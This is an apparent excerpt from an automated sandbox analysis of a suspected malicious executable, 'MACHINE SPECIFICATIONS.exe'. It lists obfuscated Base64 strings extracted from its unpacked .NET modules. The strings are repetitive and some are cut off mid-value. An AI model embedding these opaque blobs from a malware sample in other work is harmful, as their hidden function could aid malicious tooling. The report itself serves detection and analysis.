'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.2.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 0.0.MACHINE SPECIFICATIONS.exe.f80000.0.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 